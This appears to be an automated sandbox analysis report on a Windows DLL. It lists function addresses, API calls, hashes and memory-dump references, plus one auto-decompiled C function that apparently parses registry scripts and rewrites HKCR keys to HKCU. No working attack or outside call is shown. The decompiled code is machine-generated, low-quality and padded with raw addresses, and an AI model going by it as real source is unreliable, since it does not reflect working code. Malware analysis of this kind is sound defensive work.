0x6e4b7d87
0x00000000
0x6e4b7e80
0x6e4b7e80
0x6e4b7e85
0x6e4b7e85
0x00000000
0x6e4b7d57
0x00000000
0x00000000
0x00000000
0x6e4b7bd8
0x6e4b7bd8
0x6e4b7bd8
0x6e4b7bd9
0x6e4b7bdb
0x6e4b7bdd
0x6e4b7be3
0x6e4b7be6
0x6e4b7be8
0x6e4b7be9
0x6e4b7bec
0x6e4b7bee
0x6e4b7bee
0x6e4b7bef
0x6e4b7bf2
0x6e4b7bf2
0x6e4b7bf5
0x6e4b7bf5
0x00000000
0x6e4b7bd8
0x6e4b89fd
0x6e4b89fd
0x6e4b89fe
0x6e4b8a04
0x6e4b8a04

APIs

__aulldiv.LIBCMT ref: 6E4B6692
__aullrem.LIBCMT ref: 6E4B66C6
GetTickCount64.KERNEL32 ref: 6E4B676C
GetTickCount64.KERNEL32 ref: 6E4B6772
GetTickCount64.KERNEL32 ref: 6E4B67A1
GetTickCount64.KERNEL32 ref: 6E4B67A7
GetShellWindow.USER32 ref: 6E4B6927
GetOEMCP.KERNEL32 ref: 6E4B69D2

Part of subcall function 6E4B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
Part of subcall function 6E4B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
Part of subcall function 6E4B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
Part of subcall function 6E4B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

CoFreeUnusedLibraries.OLE32 ref: 6E4B6A30

Part of subcall function 6E4B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
Part of subcall function 6E4B5A30: CloseClipboard.USER32 ref: 6E4B5A73
Part of subcall function 6E4B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30

Strings

?, xrefs: 6E4B691B

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: 1b67cb61ebf40b0d20b96364be7148eca39b9c9174b3006f5fbd5add474ed74a
Instruction ID: 31164d410186108e425455d71f6933d7d9c683c26e9b69d99925057bfb02b530
Opcode Fuzzy Hash: 1b67cb61ebf40b0d20b96364be7148eca39b9c9174b3006f5fbd5add474ed74a
Instruction Fuzzy Hash: 94137C31C10B5D8ADB12DFBAD840AADF3B5AF9A340F14875AE80977291EB3069D1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D723C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4D7315

Strings

;\Ln, xrefs: 6E4D72BD

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: ;\Ln
API String ID: 269201875-2500737854
Opcode ID: 697ea802a67615866292986b059a5b2d1c29a9fced3b3b9cb85cac11e97f17f1
Instruction ID: c9248282116df63947c97e4b34cf188b9bf7509e6a4ab28c58b1a7a78f4d88c2
Opcode Fuzzy Hash: 697ea802a67615866292986b059a5b2d1c29a9fced3b3b9cb85cac11e97f17f1
Instruction Fuzzy Hash: 41418D72A106158FCB14CFADD49499DB7F1FF8E324B1582AAE915EB390D730AC45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C67A5, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E4C67AC
std::locale::_Init.LIBCPMT ref: 6E4C67CD

Part of subcall function 6E4C5FD3: __EH_prolog3.LIBCMT ref: 6E4C5FDA
Part of subcall function 6E4C5FD3: std::_Lockit::_Lockit.LIBCPMT ref: 6E4C5FE5
Part of subcall function 6E4C5FD3: std::locale::_Setgloballocale.LIBCPMT ref: 6E4C6000
Part of subcall function 6E4C5FD3: _Yarn.LIBCPMT ref: 6E4C6016
Part of subcall function 6E4C5FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E4C6056

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: be07478ad19c59e1515638a97853a9274232d9280e1fd3dc73f85590d4aa6c35
Instruction ID: 5e41267759b5f1b7ef3de1cd92f45a6a27ae90a987664f5728d2513f04b8cc11
Opcode Fuzzy Hash: be07478ad19c59e1515638a97853a9274232d9280e1fd3dc73f85590d4aa6c35
Instruction Fuzzy Hash: E0E0DF3AA126225BDA101FF48400FBCA5956F44F2AF154D5FD5015FE80CBE0480053C2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E62EB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DCCCD: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E4DA438,00000001,00000364,FFFFFFFF,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DCD0E

_free.LIBCMT ref: 6E4E6357

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction ID: f1b4630860d1fcf7fb87b58209bd1821f59346fc9a851ec3ef79ffa59bbb346e
Opcode Fuzzy Hash: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction Fuzzy Hash: 3B01FE736143056BE3218FB5D841D99FBEDFB85370F250A5ED69483280E770A805C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DCCCD, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6E4DA438,00000001,00000364,FFFFFFFF,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DCD0E

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b8402cada379f0dc644e44296688e11792d49cbf6e30a9f4541530e3f1946c94
Instruction ID: e2adc78c31e1295f043124b911a2c55cb2f0788968aea7d412794422e188e440
Opcode Fuzzy Hash: b8402cada379f0dc644e44296688e11792d49cbf6e30a9f4541530e3f1946c94
Instruction Fuzzy Hash: FBF0B4316045265BEB511EF69C30F8A7B9CAB426A4B254417AC19BE684CF70D40946E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E17FC, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

_free.LIBCMT ref: 6E4E181C

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: dee0ffea4f40e700caffb17acd15845b3d3b0f6ff6e652b8aa51f570320733c3
Instruction ID: 3490364874a4c7282474b4724c610e2d2460cd503a3d9a8a4a7b56418d8a1966
Opcode Fuzzy Hash: dee0ffea4f40e700caffb17acd15845b3d3b0f6ff6e652b8aa51f570320733c3
Instruction Fuzzy Hash: 64F06DB24057049FE3248F51D851B92B7ECFB05715F10882FE2DA87A91CBB5A848CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee52ca88b72ddefdb7846f153e9cfc7d51c3976220a35a45985501592d989751
Instruction ID: 2183f1d8fbdb88c25cfb097e1097a97c2151acdcbc7b998176c5d6f89b2a301f
Opcode Fuzzy Hash: ee52ca88b72ddefdb7846f153e9cfc7d51c3976220a35a45985501592d989751
Instruction Fuzzy Hash: F1E0E5311406225AEA511AF69D70F8A36CCAB026A0F020527EF18E6684DFE3D48986E8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E4BF700, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 404
stringmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E6E4BF700(void* __ebx, WCHAR** __ecx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v84;
				signed int _v88;
				signed int _v92;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr* _v112;
				intOrPtr _v132;
				signed int _v144;
				short _v8204;
				short _v8208;
				short _v8212;
				char _v8340;
				void* __ebp;
				signed int _t90;
				signed int _t91;
				intOrPtr* _t93;
				short _t96;
				signed int _t98;
				signed int _t99;
				intOrPtr _t101;
				WCHAR* _t104;
				intOrPtr _t107;
				signed int _t117;
				void* _t120;
				short _t122;
				void* _t125;
				void* _t129;
				void* _t132;
				void* _t133;
				void* _t139;
				WCHAR* _t146;
				WCHAR* _t147;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t157;
				WCHAR* _t158;
				void* _t165;
				WCHAR* _t168;
				WCHAR* _t169;
				intOrPtr _t171;
				WCHAR* _t177;
				char _t183;
				signed int _t190;
				WCHAR* _t191;
				WCHAR* _t199;
				signed short* _t201;
				WCHAR* _t208;
				short* _t211;
				signed int _t215;
				intOrPtr _t217;
				intOrPtr _t218;
				WCHAR** _t220;
				signed int _t223;
				intOrPtr _t224;
				WCHAR* _t226;
				signed int _t228;
				void* _t231;
				signed int _t234;
				void* _t236;
				signed int _t237;
				signed int _t242;
				void* _t258;

				_push(0xffffffff);
				_push(0x6e4e9bd8);
				_push( *[fs:0x0]);
				_t237 = _t236 - 0x60;
				_t90 =  *0x6e4ff008; // 0x2b098c7c
				_t91 = _t90 ^ _t234;
				_v20 = _t91;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t91);
				 *[fs:0x0] =  &_v16;
				_t220 = __ecx;
				_t226 = _a4;
				_t93 = _a8;
				_v112 = _t93;
				if(_t226 == 0 || _t93 == 0) {
					goto L57;
				} else {
					_t177 = _t226;
					 *_t93 = 0;
					_t6 =  &(_t177[1]); // 0x2
					_t211 = _t6;
					do {
						_t96 =  *_t177;
						_t177 =  &(_t177[1]);
					} while (_t96 != 0);
					_v88 = 0;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x5c], xmm0");
					_v96 = 0;
					_t98 =  <  ? 0x3e8 : (_t177 - _t211 >> 1) + (_t177 - _t211 >> 1);
					_v92 = _t98;
					_t99 = _t98 * 2;
					_t242 = _t98 * 2 >> 0x20;
					if(_t242 > 0 || _t242 >= 0 && _t99 > 0xffffffff) {
						_t99 = 0;
						_v88 = 0;
					} else {
						__imp__CoTaskMemAlloc(_t99);
						_v88 = _t99;
						if(_t99 != 0) {
							 *_t99 = 0;
						}
					}
					_v8 = 0;
					if(_t99 == 0) {
						L36:
						__imp__CoTaskMemFree(_v88);
						goto L57;
					} else {
						_t101 = 0;
						 *_t220 = _t226;
						_t183 = 0;
						_v99 = 0;
						_v104 = 0;
						_v98 = 0;
						_v97 = 0;
						if( *_t226 == 0) {
							L55:
							_v88 = 0;
							 *_v112 = _v88;
							__imp__CoTaskMemFree(_v88);
							goto L57;
						} else {
							_t165 = CharNextW;
							while(1) {
								_v108 = _t101;
								if(_t183 != 1) {
									goto L33;
								}
								if(_t101 != 0) {
									L20:
									_t147 =  *_t220;
									if(0x27 !=  *_t147) {
										L27:
										if(_t183 != 0) {
											goto L33;
										} else {
											goto L28;
										}
									} else {
										if(_t183 != 0) {
											if(0x27 ==  *(CharNextW(_t147))) {
												 *_t220 = CharNextW( *_t220);
												if(E6E4BE910(_t165,  &_v96, _t152, 1) == 0) {
													goto L36;
												} else {
													_t183 = _v97;
													goto L27;
												}
											} else {
												_v97 = 0;
												L28:
												_t31 = _v108 + 1; // 0x1
												_t217 =  !=  ? _v108 : _t31;
												_v104 = _t217;
												if(( *( *_t220) & 0x0000ffff) != 0x7d) {
													goto L33;
												} else {
													_t218 = _t217 + 0xffffffff;
													_v104 = _t218;
													if(_t218 != 0 || _v98 != 1) {
														goto L33;
													} else {
														if(E6E4BE9C0(_t165,  &_v96, _t220, 0x27, L"\r\n\t}\r\n}\r\n") == 0) {
															goto L36;
														} else {
															_v98 = 0;
															goto L33;
														}
													}
												}
											}
										} else {
											_v97 = 1;
											goto L33;
										}
									}
								} else {
									_push(L"HKCR");
									_push(_t226);
									_t155 = E6E4C9025(_t183);
									_t237 = _t237 + 8;
									if(_t155 == 0) {
										L19:
										_t183 = _v97;
										goto L20;
									} else {
										_t208 =  *_t220;
										if(_t155 != _t208) {
											goto L19;
										} else {
											_t156 = CharNextW(_t208);
											 *_t220 = _t156;
											_t157 = CharNextW(_t156);
											 *_t220 = _t157;
											_t158 = CharNextW(_t157);
											 *_t220 = _t158;
											 *_t220 = CharNextW(_t158);
											if(E6E4BE9C0(_t165,  &_v96, _t220, _t226, L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses") == 0) {
												goto L36;
											} else {
												_v98 = 1;
												goto L19;
											}
										}
									}
								}
								goto L82;
								L33:
								_t104 =  *_t220;
								if( *_t104 != 0x25) {
									L35:
									if(E6E4BE910(_t165,  &_v96, _t104, 1) != 0) {
										goto L52;
									} else {
										goto L36;
									}
								} else {
									_t104 = CharNextW(_t104);
									 *_t220 = _t104;
									if( *_t104 != 0x25) {
										_t107 = E6E4BEE10(_t104, 0x25);
										_v108 = _t107;
										if(_t107 == 0) {
											L42:
											__imp__CoTaskMemFree(_v88);
											goto L57;
										} else {
											_t214 =  *_t220;
											_t190 = _t107 -  *_t220 >> 1;
											if(_t190 > 0x1f) {
												__imp__CoTaskMemFree(_v88);
												L57:
												 *[fs:0x0] = _v16;
												return E6E4C4D4A(_v20 ^ _t234);
											} else {
												_push(_t190);
												L6E4BE1D0(_t165, _t214, E6E4D6399(_t190,  &_v84, 0x20, _t214));
												_t168 = _t220[1];
												_t228 = 0;
												_t237 = _t237 + 0x14;
												if(_t168[6] <= 0) {
													goto L42;
												} else {
													while(1) {
														_t191 =  &_v84;
														if(lstrcmpiW( *(_t168[2] + _t228 * 4), _t191) == 0) {
															break;
														}
														_t228 = _t228 + 1;
														if(_t228 < _t168[6]) {
															continue;
														} else {
															goto L42;
														}
														goto L82;
													}
													if(_t228 == 0xffffffff) {
														goto L42;
													} else {
														if(_t228 < 0 || _t228 >= _t168[6]) {
															E6E4B8B70(_t114, 0xc000008c, 1);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t234);
															_t235 = _t237;
															E6E4E8580();
															_t117 =  *0x6e4ff008; // 0x2b098c7c
															_v144 = _t117 ^ _t237;
															_push(_t168);
															_t169 = _t191;
															_v8340 = 0;
															_push(_t228);
															_t120 = E6E4BF700(_t169, _t169, _t220, _t228, _v132,  &_v8340);
															_t229 = _t120;
															if(_t120 >= 0) {
																_t122 = _v8208;
																 *_t169 = _t122;
																if(0 !=  *_t122) {
																	_push(_t220);
																	while(1) {
																		_t125 = E6E4BEEB0(_t169,  &_v8204);
																		_t229 = _t125;
																		if(_t125 < 0) {
																			break;
																		}
																		_t223 = 0;
																		_t231 = 0;
																		while(1) {
																			_t71 = _t231 + 0x6e4f9400; // 0x6e4f8d3c
																			if(lstrcmpiW( &_v8204,  *_t71) == 0) {
																				break;
																			}
																			_t231 = _t231 + 8;
																			_t223 = _t223 + 1;
																			if(_t231 < 0x70) {
																				continue;
																			} else {
																				L66:
																				_t229 = 0x80020009;
																			}
																			goto L67;
																		}
																		_t224 =  *((intOrPtr*)(0x6e4f9404 + _t223 * 8));
																		if(_t224 == 0) {
																			goto L66;
																		} else {
																			_t129 = E6E4BEEB0(_t169,  &_v8204);
																			_t229 = _t129;
																			if(_t129 < 0) {
																				break;
																			} else {
																				if(0x7b != _v8204) {
																					goto L66;
																				} else {
																					_t199 = _a4;
																					_push(0);
																					if(_t199 == 0) {
																						_push(0);
																						_push(_t224);
																						_push( &_v8204);
																						_t132 = E6E4BFBE0(_t169, _t169, _t224, _t229, _t258);
																						_t229 = _t132;
																						if(_t132 < 0) {
																							break;
																						} else {
																							goto L77;
																						}
																					} else {
																						_push(_t199);
																						_v8212 =  *_t169;
																						_push(_t224);
																						_push( &_v8204);
																						_t139 = E6E4BFBE0(_t169, _t169, _t224, _t229, _t258);
																						_t229 = _t139;
																						if(_t139 >= 0) {
																							while(1) {
																								L77:
																								_t201 =  *_t169;
																								_t215 =  *_t201 & 0x0000ffff;
																								_t133 = _t215 - 9;
																								if(_t133 > 0x17) {
																									break;
																								}
																								switch( *((intOrPtr*)(( *(_t133 + 0x6e4bfbc4) & 0x000000ff) * 4 +  &M6E4BFBBC))) {
																									case 0:
																										goto L79;
																									case 1:
																										goto L80;
																								}
																							}
																							L80:
																							if(0 != _t215) {
																								continue;
																							} else {
																								break;
																							}
																						} else {
																							 *_t169 = _v8212;
																							E6E4BFBE0(_t169, _t169, _t224, _t229, _t258,  &_v8204, _t224, 0, 0);
																							break;
																						}
																					}
																				}
																			}
																		}
																		goto L69;
																	}
																	L67:
																}
																__imp__CoTaskMemFree(_v8208);
															}
															L69:
															return E6E4C4D4A(_v12 ^ _t235);
														} else {
															_t144 =  *((intOrPtr*)(_t168[4] + _t228 * 4));
															if( *((intOrPtr*)(_t168[4] + _t228 * 4)) == 0) {
																goto L42;
															} else {
																if(E6E4BE9C0(_t168,  &_v96, _t220, _t228, _t144) == 0) {
																	goto L36;
																} else {
																	_t171 = _v108;
																	if( *_t220 != _t171) {
																		do {
																			_t146 = CharNextW( *_t220);
																			 *_t220 = _t146;
																		} while (_t146 != _t171);
																	}
																	_t165 = CharNextW;
																	L52:
																	_t226 = CharNextW( *_t220);
																	 *_t220 = _t226;
																	if( *_t226 == 0) {
																		goto L55;
																	} else {
																		_t101 = _v104;
																		_t183 = _v99;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										goto L35;
									}
								}
								goto L82;
							}
						}
					}
				}
				L82:
			}

0x6e4bf703
0x6e4bf705
0x6e4bf710
0x6e4bf711
0x6e4bf714
0x6e4bf719
0x6e4bf71b
0x6e4bf71e
0x6e4bf71f
0x6e4bf720
0x6e4bf721
0x6e4bf725
0x6e4bf72b
0x6e4bf72d
0x6e4bf730
0x6e4bf733
0x6e4bf738
0x00000000
0x6e4bf746
0x6e4bf746
0x6e4bf748
0x6e4bf74e
0x6e4bf74e
0x6e4bf751
0x6e4bf751
0x6e4bf754
0x6e4bf757
0x6e4bf75e
0x6e4bf767
0x6e4bf76a
0x6e4bf76f
0x6e4bf781
0x6e4bf789
0x6e4bf78c
0x6e4bf78e
0x6e4bf790
0x6e4bf7ae
0x6e4bf7b0
0x6e4bf799
0x6e4bf79a
0x6e4bf7a0
0x6e4bf7a5
0x6e4bf7a9
0x6e4bf7a9
0x6e4bf7a5
0x6e4bf7b3
0x6e4bf7bc
0x6e4bf8eb
0x6e4bf8f3
0x00000000
0x6e4bf7c2
0x6e4bf7c2
0x6e4bf7c4
0x6e4bf7cc
0x6e4bf7ce
0x6e4bf7d1
0x6e4bf7d4
0x6e4bf7d7
0x6e4bf7dd
0x6e4bf9ef
0x6e4bf9f7
0x6e4bfa01
0x6e4bfa03
0x00000000
0x6e4bf7e3
0x6e4bf7e3
0x6e4bf7f0
0x6e4bf7f0
0x6e4bf7f6
0x00000000
0x00000000
0x6e4bf7fe
0x6e4bf848
0x6e4bf848
0x6e4bf852
0x6e4bf885
0x6e4bf887
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4bf854
0x6e4bf856
0x6e4bf864
0x6e4bf877
0x6e4bf880
0x00000000
0x6e4bf882
0x6e4bf882
0x00000000
0x6e4bf882
0x6e4bf866
0x6e4bf868
0x6e4bf889
0x6e4bf894
0x6e4bf897
0x6e4bf89a
0x6e4bf8a0
0x00000000
0x6e4bf8a2
0x6e4bf8a2
0x6e4bf8a5
0x6e4bf8a8
0x00000000
0x6e4bf8b0
0x6e4bf8bf
0x00000000
0x6e4bf8c1
0x6e4bf8c1
0x00000000
0x6e4bf8c1
0x6e4bf8bf
0x6e4bf8a8
0x6e4bf8a0
0x6e4bf858
0x6e4bf858
0x00000000
0x6e4bf858
0x6e4bf856
0x6e4bf800
0x6e4bf800
0x6e4bf805
0x6e4bf806
0x6e4bf80b
0x6e4bf810
0x6e4bf845
0x6e4bf845
0x00000000
0x6e4bf812
0x6e4bf812
0x6e4bf816
0x00000000
0x6e4bf818
0x6e4bf819
0x6e4bf81c
0x6e4bf81e
0x6e4bf821
0x6e4bf823
0x6e4bf826
0x6e4bf832
0x6e4bf83b
0x00000000
0x6e4bf841
0x6e4bf841
0x00000000
0x6e4bf841
0x6e4bf83b
0x6e4bf816
0x6e4bf810
0x00000000
0x6e4bf8c5
0x6e4bf8c5
0x6e4bf8cb
0x6e4bf8d8
0x6e4bf8e5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4bf8cd
0x6e4bf8ce
0x6e4bf8d0
0x6e4bf8d6
0x6e4bf907
0x6e4bf90c
0x6e4bf911
0x6e4bf95e
0x6e4bf966
0x00000000
0x6e4bf913
0x6e4bf913
0x6e4bf919
0x6e4bf91e
0x6e4bf9e5
0x6e4bfa12
0x6e4bfa15
0x6e4bfa2d
0x6e4bf924
0x6e4bf924
0x6e4bf932
0x6e4bf937
0x6e4bf93a
0x6e4bf93c
0x6e4bf942
0x00000000
0x6e4bf944
0x6e4bf944
0x6e4bf947
0x6e4bf956
0x00000000
0x00000000
0x6e4bf958
0x6e4bf95c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4bf95c
0x6e4bf976
0x00000000
0x6e4bf978
0x6e4bf97a
0x6e4bfa37
0x6e4bfa3c
0x6e4bfa3d
0x6e4bfa3e
0x6e4bfa3f
0x6e4bfa40
0x6e4bfa41
0x6e4bfa48
0x6e4bfa4d
0x6e4bfa54
0x6e4bfa5a
0x6e4bfa5b
0x6e4bfa5d
0x6e4bfa67
0x6e4bfa72
0x6e4bfa77
0x6e4bfa7b
0x6e4bfa7d
0x6e4bfa85
0x6e4bfa8a
0x6e4bfa8c
0x6e4bfa90
0x6e4bfa99
0x6e4bfa9e
0x6e4bfaa2
0x00000000
0x00000000
0x6e4bfaa4
0x6e4bfaa6
0x6e4bfab0
0x6e4bfab0
0x6e4bfac5
0x00000000
0x00000000
0x6e4bfac7
0x6e4bfaca
0x6e4bface
0x00000000
0x6e4bfad0
0x6e4bfad0
0x6e4bfad0
0x6e4bfad0
0x00000000
0x6e4bface
0x6e4bfaf6
0x6e4bfaff
0x00000000
0x6e4bfb01
0x6e4bfb0a
0x6e4bfb0f
0x6e4bfb13
0x00000000
0x6e4bfb15
0x6e4bfb21
0x00000000
0x6e4bfb23
0x6e4bfb23
0x6e4bfb26
0x6e4bfb2a
0x6e4bfb6a
0x6e4bfb6c
0x6e4bfb75
0x6e4bfb76
0x6e4bfb7b
0x6e4bfb7f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4bfb2c
0x6e4bfb2e
0x6e4bfb2f
0x6e4bfb37
0x6e4bfb3e
0x6e4bfb3f
0x6e4bfb44
0x6e4bfb48
0x6e4bfb85
0x6e4bfb85
0x6e4bfb85
0x6e4bfb87
0x6e4bfb8a
0x6e4bfb90
0x00000000
0x00000000
0x6e4bfb99
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4bfb99
0x6e4bfbab
0x6e4bfbb0
0x00000000
0x6e4bfbb6
0x00000000
0x6e4bfbb6
0x6e4bfb4a
0x6e4bfb56
0x6e4bfb60
0x00000000
0x6e4bfb60
0x6e4bfb48
0x6e4bfb2a
0x6e4bfb21
0x6e4bfb13
0x00000000
0x6e4bfaff
0x6e4bfad5
0x6e4bfad5
0x6e4bfadc
0x6e4bfae2
0x6e4bfae4
0x6e4bfaf3
0x6e4bf989
0x6e4bf98c
0x6e4bf991
0x00000000
0x6e4bf993
0x6e4bf99e
0x00000000
0x6e4bf9a4
0x6e4bf9a4
0x6e4bf9a9
0x6e4bf9b1
0x6e4bf9b3
0x6e4bf9b5
0x6e4bf9b7
0x6e4bf9b1
0x6e4bf9bb
0x6e4bf9c1
0x6e4bf9c5
0x6e4bf9c7
0x6e4bf9cd
0x00000000
0x6e4bf9cf
0x6e4bf9cf
0x6e4bf9d5
0x00000000
0x6e4bf9d5
0x6e4bf9cd
0x6e4bf99e
0x6e4bf991
0x6e4bf97a
0x6e4bf976
0x6e4bf942
0x6e4bf91e
0x00000000
0x00000000
0x00000000
0x6e4bf8d6
0x00000000
0x6e4bf8cb
0x6e4bf7f0
0x6e4bf7dd
0x6e4bf7bc
0x00000000

APIs

CoTaskMemAlloc.OLE32(6E4BED98,2B098C7C,00000000,00000000), ref: 6E4BF79A
_wcsstr.LIBVCRUNTIME ref: 6E4BF806
CharNextW.USER32(?,00000000), ref: 6E4BF819
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF81E
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF823
CharNextW.USER32(00000000,?,00000000), ref: 6E4BF828
CharNextW.USER32(?,?,2B098C7C,00000000,00000000), ref: 6E4BF85F
CharNextW.USER32(?,?,2B098C7C,00000000,00000000), ref: 6E4BF86F
CharNextW.USER32(00000000,?,2B098C7C,00000000,00000000), ref: 6E4BF8CE
CoTaskMemFree.OLE32(00000000,2B098C7C,00000000,00000000), ref: 6E4BF8F3
lstrcmpiW.KERNEL32(?,?,?,2B098C7C,00000000,00000000), ref: 6E4BF94E
CoTaskMemFree.OLE32(00000000,?,2B098C7C,00000000,00000000), ref: 6E4BF966
CharNextW.USER32(?,?,2B098C7C,00000000,00000000), ref: 6E4BF9B3
CharNextW.USER32(?,2B098C7C,00000000,00000000), ref: 6E4BF9C3
